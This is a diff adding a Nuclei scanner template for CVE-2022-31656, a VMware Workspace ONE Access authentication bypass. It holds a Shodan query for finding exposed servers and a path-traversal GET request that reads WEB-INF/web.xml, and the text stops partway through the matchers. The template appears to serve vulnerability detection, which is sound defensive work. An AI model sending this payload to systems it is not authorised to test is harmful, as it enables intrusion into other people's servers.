diff --git a/cves/2022/CVE-2022–31656.yaml b/cves/2022/CVE-2022–31656.yaml new file mode 100644 index 0000000000..4205e57f2b --- /dev/null +++ b/cves/2022/CVE-2022–31656.yaml @@ -0,0 +1,39 @@ +id: CVE-2022–31656 + +info: + name: VMware Authentication Bypass + author: DhiyaneshDk + severity: high + description: | + VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + reference: + - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd + - https://www.vmware.com/security/advisories/VMSA-2022-0021.html + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656 + - https://nvd.nist.gov/vuln/detail/CVE-2022-31656 + metadata: + verified: true + shodan-query: http.favicon.hash:-1250474341 + tags: cve,cve2022,vmware,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "